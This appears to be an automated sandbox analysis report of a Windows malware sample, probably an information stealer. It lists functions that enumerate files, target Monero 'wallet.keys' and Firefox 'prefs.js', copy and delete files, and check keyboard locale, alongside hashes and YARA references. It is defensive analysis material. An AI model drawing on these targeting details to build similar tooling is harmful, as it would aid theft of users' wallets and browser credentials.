                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\%s
                              • API String ID: 180737720-4073750446
                              • Opcode ID: 495fdbc1104f8b0c5525cf939cc006979bad715b3cf419c8da8e2cd9dcd15298
                              • Instruction ID: 2b687ed4e12ca080d8043852e855e51006bda27a38e8105f3614e78126ffa0f1
                              • Opcode Fuzzy Hash: 495fdbc1104f8b0c5525cf939cc006979bad715b3cf419c8da8e2cd9dcd15298
                              • Instruction Fuzzy Hash: 865136B2900218ABCB24EBB4DC45EEE737CFB98300F444598B65D96140DB75DB899F72
                              Function 00D3ED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 00D3ED3E
                              • FindFirstFileA.KERNEL32(?,?), ref: 00D3ED55
                              • StrCmpCA.SHLWAPI(?,00D51538), ref: 00D3EDAB
                              • StrCmpCA.SHLWAPI(?,00D5153C), ref: 00D3EDC1
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00D3F2AE
                              • FindClose.KERNEL32(000000FF), ref: 00D3F2C3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\*.*
                              • API String ID: 180737720-1013718255
                              • Opcode ID: bd219b53c6d2f73af22e2400b2e8c6bc06ac30b17d145bd77658a742e9b304b5
                              • Instruction ID: f3e1a19a09c6271c50a2559fd4154a2a590b6aa7f23adb607653ab60b373f78c
                              • Opcode Fuzzy Hash: bd219b53c6d2f73af22e2400b2e8c6bc06ac30b17d145bd77658a742e9b304b5
                              • Instruction Fuzzy Hash: 10E1AF72951128ABFB55FB64DC52EEE7338EF54300F414599B50A62092EE306F8ACF72
                              Function 00D3F6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                                • Part of subcall function 00D4A920: lstrcpy.KERNEL32(00000000,?), ref: 00D4A972
                                • Part of subcall function 00D4A920: lstrcat.KERNEL32(00000000), ref: 00D4A982
                                • Part of subcall function 00D4A9B0: lstrlen.KERNEL32(?,008D8A30,?,\Monero\wallet.keys,00D50E17), ref: 00D4A9C5
                                • Part of subcall function 00D4A9B0: lstrcpy.KERNEL32(00000000), ref: 00D4AA04
                                • Part of subcall function 00D4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AA12
                                • Part of subcall function 00D4A8A0: lstrcpy.KERNEL32(?,00D50E17), ref: 00D4A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00D515B8,00D50D96), ref: 00D3F71E
                              • StrCmpCA.SHLWAPI(?,00D515BC), ref: 00D3F76F
                              • StrCmpCA.SHLWAPI(?,00D515C0), ref: 00D3F785
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00D3FAB1
                              • FindClose.KERNEL32(000000FF), ref: 00D3FAC3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID: prefs.js
                              • API String ID: 3334442632-3783873740
                              • Opcode ID: a3cd4836a864f57e3d0fc1bdf0ea92f80c8b2f7f4746d7d0a8274efaf37da962
                              • Instruction ID: f50455b1ed5ae4b23b5da05b335e6b5f6252c761a3fe7b043a96e919945107a9
                              • Opcode Fuzzy Hash: a3cd4836a864f57e3d0fc1bdf0ea92f80c8b2f7f4746d7d0a8274efaf37da962
                              • Instruction Fuzzy Hash: 83B103719401189BDB24FF64DC96FEE7379EF94300F4085A9A80A96151EF30AB49CFB2
                              Function 00D316D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00D5510C,?,?,?,00D551B4,?,?,00000000,?,00000000), ref: 00D31923
                              • StrCmpCA.SHLWAPI(?,00D5525C), ref: 00D31973
                              • StrCmpCA.SHLWAPI(?,00D55304), ref: 00D31989
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00D31D40
                              • DeleteFileA.KERNEL32(00000000), ref: 00D31DCA
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00D31E20
                              • FindClose.KERNEL32(000000FF), ref: 00D31E32
                                • Part of subcall function 00D4A920: lstrcpy.KERNEL32(00000000,?), ref: 00D4A972
                                • Part of subcall function 00D4A920: lstrcat.KERNEL32(00000000), ref: 00D4A982
                                • Part of subcall function 00D4A9B0: lstrlen.KERNEL32(?,008D8A30,?,\Monero\wallet.keys,00D50E17), ref: 00D4A9C5
                                • Part of subcall function 00D4A9B0: lstrcpy.KERNEL32(00000000), ref: 00D4AA04
                                • Part of subcall function 00D4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AA12
                                • Part of subcall function 00D4A8A0: lstrcpy.KERNEL32(?,00D50E17), ref: 00D4A905
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                              • String ID: \*.*
                              • API String ID: 1415058207-1173974218
                              • Opcode ID: 307d2676bb44fb0f51457fbe206a264cf2ce1c9af28c372b4407ceadba99cc0f
                              • Instruction ID: 3f16e45d94f0651284f9f78644363def1c608f383060d45a0d1f022562ed99cb
                              • Opcode Fuzzy Hash: 307d2676bb44fb0f51457fbe206a264cf2ce1c9af28c372b4407ceadba99cc0f
                              • Instruction Fuzzy Hash: 90121E71950118ABEB19FB64DC96EEE7378EF54300F4145A9B50A62091EF306F89CFB2
                              Function 00D3DE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                                • Part of subcall function 00D4A9B0: lstrlen.KERNEL32(?,008D8A30,?,\Monero\wallet.keys,00D50E17), ref: 00D4A9C5
                                • Part of subcall function 00D4A9B0: lstrcpy.KERNEL32(00000000), ref: 00D4AA04
                                • Part of subcall function 00D4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AA12
                                • Part of subcall function 00D4A8A0: lstrcpy.KERNEL32(?,00D50E17), ref: 00D4A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00D50C2E), ref: 00D3DE5E
                              • StrCmpCA.SHLWAPI(?,00D514C8), ref: 00D3DEAE
                              • StrCmpCA.SHLWAPI(?,00D514CC), ref: 00D3DEC4
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00D3E3E0
                              • FindClose.KERNEL32(000000FF), ref: 00D3E3F2
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                              • String ID: \*.*
                              • API String ID: 2325840235-1173974218
                              • Opcode ID: 504100a35f5cb9b439495369eb2b799f265f7f74aad5cee2d5b58942fae4c3a1
                              • Instruction ID: f0ae026ba27d94ff183f41b72f25efc8ffa20efc66cdbcbc9526c5bfa3761740
                              • Opcode Fuzzy Hash: 504100a35f5cb9b439495369eb2b799f265f7f74aad5cee2d5b58942fae4c3a1
                              • Instruction Fuzzy Hash: 79F17D718541289BEB15EB64DC96EEE7338FF54304F9141DAA41A62091EF306F8ACF72
                              Function 00D3DA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                                • Part of subcall function 00D4A920: lstrcpy.KERNEL32(00000000,?), ref: 00D4A972
                                • Part of subcall function 00D4A920: lstrcat.KERNEL32(00000000), ref: 00D4A982
                                • Part of subcall function 00D4A9B0: lstrlen.KERNEL32(?,008D8A30,?,\Monero\wallet.keys,00D50E17), ref: 00D4A9C5
                                • Part of subcall function 00D4A9B0: lstrcpy.KERNEL32(00000000), ref: 00D4AA04
                                • Part of subcall function 00D4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AA12
                                • Part of subcall function 00D4A8A0: lstrcpy.KERNEL32(?,00D50E17), ref: 00D4A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00D514B0,00D50C2A), ref: 00D3DAEB
                              • StrCmpCA.SHLWAPI(?,00D514B4), ref: 00D3DB33
                              • StrCmpCA.SHLWAPI(?,00D514B8), ref: 00D3DB49
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00D3DDCC
                              • FindClose.KERNEL32(000000FF), ref: 00D3DDDE
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID:
                              • API String ID: 3334442632-0
                              • Opcode ID: d90b50e7fed52864b823f5638cac0e13bfb08ff1679b0e3caadcf5b87076b36a
                              • Instruction ID: 029664e6f4bb696c25dc6c440fec34672b04335a7a58fe3eb093ca3f7ac7904c
                              • Opcode Fuzzy Hash: d90b50e7fed52864b823f5638cac0e13bfb08ff1679b0e3caadcf5b87076b36a
                              • Instruction Fuzzy Hash: 64913172900118ABDB14FB74EC569ED737DEF94300F418668F90A96181EE349B598FB3
                              Function 00D47B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                              • GetKeyboardLayoutList.USER32(00000000,00000000,00D505AF), ref: 00D47BE1
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00D47BF9
                              • GetKeyboardLayoutList.USER32(?,00000000), ref: 00D47C0D
                              • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00D47C62
                              • LocalFree.KERNEL32(00000000), ref: 00D47D22
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                              • String ID: /
                              • API String ID: 3090951853-4001269591
                              • Opcode ID: 19081bb7519234a8a14033a5ae626fcef186d9597edc4f6a8943596b3cd0944a
                              • Instruction ID: d7bd04513c9b0b82fe4e31eba809ba8bffe8b2b198257dc52f367b5b45b236f8
                              • Opcode Fuzzy Hash: 19081bb7519234a8a14033a5ae626fcef186d9597edc4f6a8943596b3cd0944a
                              • Instruction Fuzzy Hash: DF413C71940218ABDB24DF94DC99BEEB7B8FF44700F204199E50962191DB346F89CFB2
                              Function 010FA3A3 Relevance: 10.3, Strings: 7, Instructions: 1567COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: \w$%}?{$Fvdn$tm8$yL`_$5}]$5}]
                              • API String ID: 0-397602185
                              • Opcode ID: 0f0681c78dc62db753c32110e57e400e5f994c06e796bb101027d6a22832c72c
                              • Instruction ID: c00f5dd85189bb927e15d5ad19c2e6e155c13ba2ffc0443d775c098acc941f27
                              • Opcode Fuzzy Hash: 0f0681c78dc62db753c32110e57e400e5f994c06e796bb101027d6a22832c72c
                              • Instruction Fuzzy Hash: BAB2E6F3A082049FE304AE2DDC4577ABBE9EF94720F1A493DEAC4D7744E63598018697
                              Function 010F0369 Relevance: 10.3, Strings: 7, Instructions: 1516COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: #PD]$OB:g$WGnu$WGnu$aO{$t|u;$ti^
                              • API String ID: 0-1614462848
                              • Opcode ID: 161d9c498fab733d8a599ff864405373575c539d673dc6b17503f98069699f3f
                              • Instruction ID: 0b0f960c6b373628db77fa5a85328b67932eba36b9ab407b96513b6c5a0e55f4
                              • Opcode Fuzzy Hash: 161d9c498fab733d8a599ff864405373575c539d673dc6b17503f98069699f3f
                              • Instruction Fuzzy Hash: 0FA25AF3A0C2149FE3046E2DEC8567ABBE9EF94320F1A463DEAC4C7744E97558018697
                              Function 00D3E430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                                • Part of subcall function 00D4A920: lstrcpy.KERNEL32(00000000,?), ref: 00D4A972
                                • Part of subcall function 00D4A920: lstrcat.KERNEL32(00000000), ref: 00D4A982
                                • Part of subcall function 00D4A9B0: lstrlen.KERNEL32(?,008D8A30,?,\Monero\wallet.keys,00D50E17), ref: 00D4A9C5
                                • Part of subcall function 00D4A9B0: lstrcpy.KERNEL32(00000000), ref: 00D4AA04
                                • Part of subcall function 00D4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AA12
                                • Part of subcall function 00D4A8A0: lstrcpy.KERNEL32(?,00D50E17), ref: 00D4A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00D50D73), ref: 00D3E4A2
                              • StrCmpCA.SHLWAPI(?,00D514F8), ref: 00D3E4F2
                              • StrCmpCA.SHLWAPI(?,00D514FC), ref: 00D3E508
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00D3EBDF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                              • String ID: \*.*
                              • API String ID: 433455689-1173974218
                              • Opcode ID: c7a8b874b4bbe4933a86301a47f63894918a4bbb2b034be2823b5feb71d7feb0
                              • Instruction ID: 6be5f57856d81976af004421d3024e42322c7e323ee9f88ee36b442bd0c6d416
                              • Opcode Fuzzy Hash: c7a8b874b4bbe4933a86301a47f63894918a4bbb2b034be2823b5feb71d7feb0
                              • Instruction Fuzzy Hash: 74121072950118ABEB14FB64DC96EED7378EF94300F4145A9B50AA6091EF306F49CFB2
                              Function 00D3C820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00D3C871
